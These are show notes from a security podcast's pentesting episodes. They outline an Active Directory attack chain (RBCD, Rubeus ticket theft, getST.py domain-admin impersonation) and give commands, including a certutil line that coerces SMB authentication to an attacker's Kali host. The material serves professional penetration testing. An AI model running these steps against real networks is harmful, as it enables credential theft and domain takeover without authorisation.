7 Minute Security

Today we’re revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level.  Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition of Light Pentest LITE training!

This was my favorite pentest tale of pwnage to date!  There’s a lot to cover in this episode so I’m going to try and bullet out the TLDR version here:

• Sprinkled farmer files around the environment
• Found high-priv boxes with WebClient enabled
• Added “ghost” machine to the Active Directory (we’ll call it GHOSTY)
• RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against the victim system where some higher-priv users were sitting
• Use net.py to add myself to local admin on the victim host
• Find a vulnerable service to hijack and have run an evil, TGT-gathering Rubeus.exe – found that Credential Guard was cramping my style!
• Pulled the TGT from a host not protected with Credential Guard
• Figured out the stolen user’s account has some “write” privileges to a domain controller
• Use rbcd.py to delegate from GHOSTY and to the domain controller
• Request a TGT for GHOSTY
• Use getST.py to impersonate CIFS using a domain admin account on the domain controller (important thing here was to specify the DC by its FQDN, not just hostname)
• Final move: use the domain admin ccache file to leverage net.py and add myself to the Active Directory Administrators group

Today’s tale of pentest pwnage talks about the dark powers of the net.py script from impacket.

Today we’re talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges:

• Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them.
• Also look at Look at Get-ScheduledTasks
• Find ids and passwords easily in Snaffler output with this Snaffler cleaner script
• There’s a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse!

Hello friends, I’m excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! – which stands for Brian’s Pentesting and Technical Tips for You! It’s a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!

Artificial hype alert!  I’m working on a NEW version of BPATTY (Brian’s Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation.  It’s weird.  But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).

Today we’re talking about eating the security dog food – specifically:

• Satisfying critical security control #1
• Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory
• Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

Hi, today’s tale of pentest pwnage covers a few wins and one loss:

1. A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session
2. Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile
3. Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login

Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus!  It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include:

• docusaurus.config.js – for setting the site title and key config settings
• sidebars.js – used to create/edit navigation bar menus
• /src/css/custom.css – to style the site

Today’s tale of pentest pwnage includes some fun stuff, including:

• • SharpGPOAbuse helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address.  When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
  • I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s).  If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
  • DonPAPI got an upgrade recently with a focus on evasion!
  • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive.  Then I really like to follow this article to pull passwords from VM memory dumps.
  • Can’t RDP into a victim system that you’re PSRemote’d into?  Maybe RDP is listening on an alternate port!  Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!